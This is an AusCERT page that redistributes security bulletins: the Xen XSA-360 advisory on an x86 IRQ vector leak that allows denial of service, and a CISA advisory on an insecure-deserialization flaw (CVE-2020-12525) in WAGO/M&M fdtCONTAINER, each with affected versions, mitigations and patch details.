  o Additional metrics and comparison tools for the sync connections
  o Better management of API key usage along with logging
  o A new tool that allows the exclusion of certain values from the correlation
    engine (useful to avoid having regularly observed values recurring in a
    large number of events generating too much noise)

Along with many other fixes.

A special thank you to @JakubOnderka for providing a steady stream of QoL
improvements, making MISP more pleasant to use by the day!

Acknowledgement

We would like to thank all the contributors, reporters and users who have
helped us in the past months to improve MISP and information sharing at large.

This release includes multiple updates in misp-objects, misp-taxonomies and
misp-galaxy. As always, a detailed and complete changelog is available with all
the fixes, changes and improvements.

- --------------------------END INCLUDED TEXT--------------------
AusCERT - Security Bulletins · 22 January 2021

ESB-2021.0263 - [Linux][Virtual] Xen: Denial of service - Existing account

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256

===========================================================================
             AUSCERT External Security Bulletin Redistribution

                               ESB-2021.0263
                          IRQ vector leak on x86
                               22 January 2021

===========================================================================

        AusCERT Security Bulletin Summary
        ---------------------------------

Product:           Xen
Publisher:         Xen
Operating System:  Linux variants
                   Virtualisation
Impact/Access:     Denial of Service -- Existing Account
Resolution:        Patch/Upgrade

Original Bulletin:
   http://xenbits.xen.org/xsa/advisory-360.html

- --------------------------BEGIN INCLUDED TEXT--------------------

- -----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256

                    Xen Security Advisory XSA-360

                       IRQ vector leak on x86

ISSUE DESCRIPTION
=================

An x86 HVM guest with PCI pass through devices can force the allocation of all
IDT vectors on the system by rebooting itself with MSI or MSI-X capabilities
enabled and entries set up.

Such reboots will leak any vectors used by the MSI(-X) entries that the guest
might have enabled, and hence will lead to vector exhaustion on the system, not
allowing further PCI pass through devices to work properly.

IMPACT
======

HVM guests with PCI pass through devices can mount a Denial of Service (DoS)
attack affecting the pass through of PCI devices to other guests or the
hardware domain. In the latter case this would affect the entire host.

VULNERABLE SYSTEMS
==================

Xen versions 4.12.3, 4.12.4, and all versions from 4.13.1 onwards are
vulnerable. Xen version 4.13.0 and all versions up to 4.12.2 are not affected.

Only x86 systems running HVM guests with PCI pass through devices are
vulnerable.

MITIGATION
==========

Not running HVM guests with PCI pass through devices will avoid the
vulnerability.

Note that even non-malicious guests can trigger this vulnerability as part of
normal operation.

RESOLUTION
==========

Applying the appropriate attached patch resolves this issue.
Note that patches for released versions are generally prepared to apply to the
stable branches, and may not apply cleanly to the most recent release tarball.
Downstreams are encouraged to update to the tip of the stable branch before
applying these patches.

xsa360.patch           xen-unstable
xsa360-4.14.patch      Xen 4.14 - 4.12

$ sha256sum xsa360*
c874ad2b9edb0791ac975735306d055b1916f4acbc59e6f1550fbf33223d6106  xsa360.meta
592f3afda63777d31844e0e34d85fbe387a62d59fa7903ee19b22a98fba68894  xsa360.patch
809515011efb781a2a8742e9acfd76412d3920c2d4142bb187588cd36f77383e  xsa360-4.14.patch
$

CREDITS
=======

This issue was discovered by James McCoy, debugged in combination with Samuel
Verschelde of Vates, and recognised as a security issue by Roger Pau Monne of
Citrix.

NOTE REGARDING LACK OF EMBARGO
==============================

This was reported and debugged publicly, before the security implications were
apparent.

- --------------------------END INCLUDED TEXT--------------------
AusCERT - Security Bulletins · 22 January 2021

ESB-2021.0262 - [Win][Appliance] WAGO M&M Software fdtCONTAINER: Execute arbitrary code/commands - Existing account

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256

===========================================================================
             AUSCERT External Security Bulletin Redistribution

                               ESB-2021.0262
           Advisory (icsa-21-021-05) WAGO M&M Software fdtCONTAINER
                               22 January 2021

===========================================================================

        AusCERT Security Bulletin Summary
        ---------------------------------

Product:           WAGO M&M Software fdtCONTAINER
Publisher:         ICS-CERT
Operating System:  Windows
                   Network Appliance
Impact/Access:     Execute Arbitrary Code/Commands -- Existing Account
Resolution:        Patch/Upgrade
CVE Names:         CVE-2020-12525

Original Bulletin:
   https://us-cert.cisa.gov/ics/advisories/icsa-21-021-05

- --------------------------BEGIN INCLUDED TEXT--------------------

ICS Advisory (ICSA-21-021-05)

WAGO M&M Software fdtCONTAINER

Original release date: January 21, 2021

Legal Notice

All information products included in https://us-cert.cisa.gov/ics are provided
"as is" for informational purposes only. The Department of Homeland Security
(DHS) does not provide any warranties of any kind regarding any information
contained within. DHS does not endorse any commercial product or service,
referenced in this product or otherwise. Further dissemination of this product
is governed by the Traffic Light Protocol (TLP) marking in the header. For more
information about TLP, see https://us-cert.cisa.gov/tlp/.

1. EXECUTIVE SUMMARY

  o CVSS v3 7.3
  o ATTENTION: Low skill level to exploit
  o Vendor: M&M Software GmbH, a subsidiary of WAGO Kontakttechnik
  o Equipment: fdtCONTAINER
  o Vulnerability: Deserialization of Untrusted Data

2. RISK EVALUATION

If an attacker can socially engineer a valid user into loading a manipulated
project file, malicious code can be executed without notice.

3. TECHNICAL DETAILS

3.1 AFFECTED PRODUCTS

The following products are affected:

  o fdtCONTAINER component
      Versions between 3.5.0 and 3.5.20304.x
      Versions between 3.6.0 and 3.6.20304.x
      Versions older than 3.5
  o fdtCONTAINER application
      Versions between 4.5.0 and 4.5.20304.x
      Versions between 4.6.0 and 4.6.20304.x
      Versions older than 4.5
  o dtmINSPECTOR Version 3 (Based on FDT 1.2.x)

There are reports indicating the following products incorporate the affected
component:

  o Emerson Rosemount Transmitter Interface Software (RTIS) SKUs:
    04088-9000-0001, 4088-9000-0002, and 7000003-312
  o PEPPERL+FUCHS PACTware 5.0, up to and including Version 5.0.5.31

3.2 VULNERABILITY OVERVIEW

3.2.1 DESERIALIZATION OF UNTRUSTED DATA CWE-502

A vulnerability has been discovered in the fdtCONTAINER component issued by M&M
Software and used by other products, including RTIS and PACTware. An attacker
might be able to exploit this vulnerability on the workstation running RTIS by
supplying/providing a manipulated project file. If that project file is loaded,
malicious code can be executed without notice.

CVE-2020-12525 has been assigned to this vulnerability. A CVSS v3 base score of
7.3 has been calculated; the CVSS vector string is
(AV:L/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H).

3.3 BACKGROUND

  o CRITICAL INFRASTRUCTURE SECTORS: Commercial Facilities, Critical
    Manufacturing, Energy, Transportation Systems
  o COUNTRIES/AREAS DEPLOYED: Worldwide
  o COMPANY HEADQUARTERS LOCATION: Germany

3.4 RESEARCHER

Emerson reported this vulnerability to CISA and M&M Software.

4. MITIGATIONS

M&M Software recommends users choose one of the following solutions:

  o Update the fdtCONTAINER component/fdtCONTAINER application to a version
    that provides a more secure deserialization of the project data. This
    version will still use a deprecated serialization technology but will fix
    the currently known attack vector and will be compatible with existing,
    non-manipulated project files.
  o Update the fdtCONTAINER component/fdtCONTAINER application to a version
    (fdtCONTAINER component: 3.7 or newer, fdtCONTAINER application: 4.7 or
    newer) that provides a secure deserialization of the project data with an
    updated serialization technology. This will break compatibility with
    existing, non-manipulated project files.

The CERT@VDE advisory for M&M Software also recommends the following mitigation
practices:

  o Exchange project data only via secure exchange services.
  o Use appropriate means to protect the project storage from unauthorized
    manipulation.
  o Do not open project data from an unknown source.
  o Reduce the user rights of the host application to the necessary minimum.

Emerson recommends users ensure all workstations containing any software used
to interact with field instruments be protected using industry cybersecurity
best practices. Furthermore, Emerson has made the decision to discontinue RTIS,
so no additional software updates will be provided. Therefore, Emerson
recommends users transition to the free AMS Instrument Inspector software as a
replacement device configuration tool. For additional information, please
contact Emerson Global Customer Care (24/7 Support) Phone: +1-888-889-9170 or
email: ContactUs@Emerson.com

CERT@VDE has published an advisory (VDE-2021-001) for this vulnerability in
PEPPERL+FUCHS PACTware.

CISA recommends users take the following measures to protect themselves from
social engineering attacks:

  o Ensure the least-privilege user principle is followed.
  o Do not open project files from untrusted sources.
  o Do not click web links or open unsolicited attachments in email messages.
  o Refer to Recognizing and Avoiding Email Scams for more information on
    avoiding email scams.
  o Refer to Avoiding Social Engineering and Phishing Attacks for more
    information on social engineering attacks.

CISA reminds organizations to perform proper impact analysis and risk
assessment prior to deploying defensive measures.
CISA also provides a section for control systems security recommended practices
on the ICS webpage on us-cert.cisa.gov. Several recommended practices are
available for reading and download, including Improving Industrial Control
Systems Cybersecurity with Defense-in-Depth Strategies.

Additional mitigation guidance and recommended practices are publicly available
on the ICS webpage on us-cert.cisa.gov in the Technical Information Paper,
ICS-TIP-12-146-01B--Targeted Cyber Intrusion Detection and Mitigation
Strategies.

Organizations observing any suspected malicious activity should follow their
established internal procedures and report their findings to CISA for tracking
and correlation against other incidents.

No known public exploits specifically target this vulnerability. This
vulnerability is not exploitable remotely.

For any questions related to this report, please contact the CISA at:

Email: CISAservicedesk@cisa.dhs.gov
Toll Free: 1-888-282-0870

CISA continuously strives to improve its products and services. You can help by
choosing one of the links below to provide feedback about this product.

- --------------------------END INCLUDED TEXT--------------------
The decision to follow or act on information or advice contained in this security bulletin is the responsibility of each user or organisation, and should be considered in accordance with your organisation's site policies and procedures. AusCERT takes no responsibility for consequences which may arise from following or acting on information or advice contained in this security bulletin.

NOTE: This is only the original release of the security bulletin. It may not be updated when updates to the original are made. If downloading at a later date, it is recommended that the bulletin is retrieved directly from the author's website to ensure that the information is still current.

Contact information for the authors of the original document is included in the Security Bulletin above. If you have any questions or need further information, please contact them directly.

Previous advisories and external security bulletins can be retrieved from:
https://www.auscert.org.au/bulletins/

===========================================================================
Australian Computer Emergency Response Team
The University of Queensland
Brisbane Qld 4072

Internet Email: auscert@auscert.org.au
Facsimile: (07) 3365 7031
Telephone: (07) 3365 4417 (International: +61 7 3365 4417)
AusCERT personnel answer during Queensland business hours which are GMT+10:00 (AEST). On call after hours for member emergencies only.
===========================================================================
-----BEGIN PGP SIGNATURE-----
Comment: http://www.auscert.org.au/render.html?it=1967

iQIVAwUBYAoWjeNLKJtyKPYoAQjsSQ/5Aa54o7o8qyDknsT+hT4BNNL2LiL6ycKL
Byeox1tDWMqxUkb/McPjIeQcXThXs3kROUVb7Vav4vEKOwX6Huj6Ch3ULKJaq2cv
OKzEo6Lpnk3e+otQjRoRlgpDH8/Ndl+RKWyO/n1Sja9vU8kCER6Q7HYZkPo10RWb
9hPix+6SEDIUET5rzoX+yi8Jfu0xxAOn/NRg/PCLQZ52gutigdv8GkXhdJGkLSTE
IcuSVA4k99VdpDEdt3nVjURdyTELNVEtPNarpKgaJIwwY21cbe2sKoI3U3kMtB8w
gqCBhok0SgcREJw7LPFxQUNo70gm2kY9YHPe1reoLy5Jzj7Eiduu/2uWNHUMXqkF
PNnV6QB2ySPtMq+sR8T+dyY7tyN0kanF8uS+4oKQZP6b/cW6Aa8kNw/7aYPwazF2
/OzWu37QWgjUjIX2Mj4aeVKqbiPQ+ncxHxWlwB1FEYHdvzJ46MC9nQ4zKJ2V8wFq
ZN/LmNhJIUJZkpyg29lCvIAVQJmeg26mA3+shZv2YktQN9/HtMI24+CloKKferQL
NkUKo/ho//XbncJt8WjCHmLAoSVJaF9B8o93C5na+Opw7M09lbF/0EeJ25wmDKJ/
PWwE3Dszn+tNJYYfLRaGpFP8/VMfthbu8e1PREhEL0zIvvqBm4GnYEsYb8FQU6Fp
PgsQ1l6CC7I=
=0IhC
-----END PGP SIGNATURE-----
